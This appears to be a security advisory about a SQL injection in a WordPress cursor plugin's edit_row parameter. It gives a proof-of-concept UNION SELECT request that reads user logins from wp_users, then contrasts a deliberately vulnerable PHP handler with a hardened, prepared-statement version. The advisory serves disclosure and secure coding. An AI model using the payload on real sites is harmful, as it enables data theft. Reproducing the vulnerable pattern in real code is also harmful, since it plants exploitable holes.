The plugin does not sanitize or escape the edit_row parameter before using it in a SQL statement, leading to a SQL injection exploitable by highly privileged users such as admin.

Proof of Concept

GET /wp-admin/admin.php?page=wpcc_add_new&edit_row=-1+UNION+select+1,1,1,1,user_login,1,1,1,1,1,1,1,1,1,1,1+from+wp_users HTTP/1.1
Host: localhost

Select “Text Cursor”, and the selected user_login value from wp_users will appear in the input field.
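The following PHP is an added illustration of the pattern behind this advisory and is not the plugin's own code: a hypothetical handler for the wpcc_add_new page that interpolates edit_row straight into a query, beside a hardened version that casts the value and binds it through $wpdb->prepare(). The table name wpcc_cursors, the function names and the capability used are assumptions.

```php
<?php
// Added example, not the plugin's code. Table name and function names are
// assumed for illustration only.

// VULNERABLE: the raw query-string value becomes part of the SQL text, so a
// value such as "-1 UNION SELECT ..." is executed as SQL rather than treated
// as a row id. A capability check alone does not help here, because the
// attacker described in the advisory is already a high-privileged user.
function wpcc_get_cursor_unsafe() {
    global $wpdb;
    $edit_row = isset( $_GET['edit_row'] ) ? $_GET['edit_row'] : '';
    $sql      = "SELECT * FROM {$wpdb->prefix}wpcc_cursors WHERE id = " . $edit_row;
    return $wpdb->get_row( $sql, ARRAY_A );
}

// HARDENED: the row id is an integer, so cast it, reject non-positive values,
// and still pass it through $wpdb->prepare() with %d so the value can never
// change the structure of the statement.
function wpcc_get_cursor_safe() {
    global $wpdb;

    // Keep the page restricted to users allowed to manage the plugin.
    if ( ! current_user_can( 'manage_options' ) ) {
        return null;
    }

    $edit_row = isset( $_GET['edit_row'] ) ? (int) wp_unslash( $_GET['edit_row'] ) : 0;
    if ( $edit_row <= 0 ) {
        return null; // no valid row requested (covers "-1 UNION ..." -> -1)
    }

    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}wpcc_cursors WHERE id = %d",
        $edit_row
    );
    return $wpdb->get_row( $sql, ARRAY_A );
}
```

With the hardened version the proof-of-concept request above resolves to the integer -1, is rejected before any query runs, and even a crafted value that survived the cast would only ever be bound as a number.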